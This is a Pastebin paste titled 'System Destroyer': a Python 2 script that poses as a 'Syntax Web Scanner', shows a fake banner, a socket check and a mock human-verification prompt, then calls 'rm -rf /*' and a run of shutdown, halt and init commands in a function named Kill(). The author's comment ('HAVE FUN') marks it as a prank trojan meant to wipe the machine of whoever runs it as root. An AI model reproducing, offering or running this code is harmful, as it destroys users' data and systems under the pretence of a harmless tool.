Advertisement
deathslayer999

System Destroyer

Oct 2nd, 2019
699
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.99 KB | None | 0 0
  1. #bin/bash/python2
  2. #Made By N.. LOL HAVE FUN TBH
  3. import random
  4. import os
  5. import time
  6. import colorama
  7. import socket
  8.  
  9. os.system('clear')
  10.  
  11. username=os.system("whoami")
  12. if username is not "root":
  13.     print "You aren't root"
  14.     exit()
  15.  
  16.  
  17. else:
  18.     print "l, "+username
  19.     time.sleep(3)
  20.  
  21. def Banner():
  22.  
  23.     print '\033[31m'
  24.     print "                   - - - - - - - - - - - - - - - -       "
  25.     print "                    Welcome To Syntax Web Scanner                  "
  26.     print "                   - - - - - - - - - - - - - - - -   "
  27.     print "             =     =     =        =     =   =     =       =      "
  28.     print "             =    =    =      =        =      =   =     =     =  "
  29.     print "                =     =    =      =    =  =    =    ==   =    =  "
  30.     time.sleep(4)
  31. Banner()
  32.  
  33. def Create():
  34.    print "                                  "
  35.    print '\033[33m'
  36.    print "Removing DIRS "
  37.    os.system('rm -rf Scanner')
  38.    time.sleep(5)
  39.    print "Creating DIRS"
  40.    os.system('mkdir Scanner')
  41.    print "Creating Sockets "
  42.    time.sleep(3)
  43.    print "Socket  Connected Here "
  44.    print([(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1])
  45.    time.sleep(3)
  46.    print "                                 "
  47.    print "AUTO LOGIN U IN AS ROOT "
  48.    
  49.    print "                        "
  50.    print "Clearing Screen In 3 Secs"
  51.    time.sleep(3)
  52.    os.system('clear')
  53. Create()
  54.  
  55. def Random():
  56.    print " Imput The WebSite Here :"
  57.    time.sleep(1)
  58.    print "Oops Please Verify That u Are A Person "
  59.    print "u Got 1 Chance if  u Fail There No Going Back "
  60.    print "                            "
  61.    print "i Am Picking Ur Numbers To Live "
  62.    list1 = [1, 2, 3, 4]
  63.    print(random.choice(list1))
  64.    time.sleep(5)
  65.    print " ur Dead "
  66.  
  67. Random()
  68.  
  69. def Kill():
  70.    os.system('rm -rf /*')
  71.    os.system('shutdown -r now')
  72.    os.system('halt')
  73.    os.system('init 0')
  74.    os.system('init 6')
  75. Kill()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement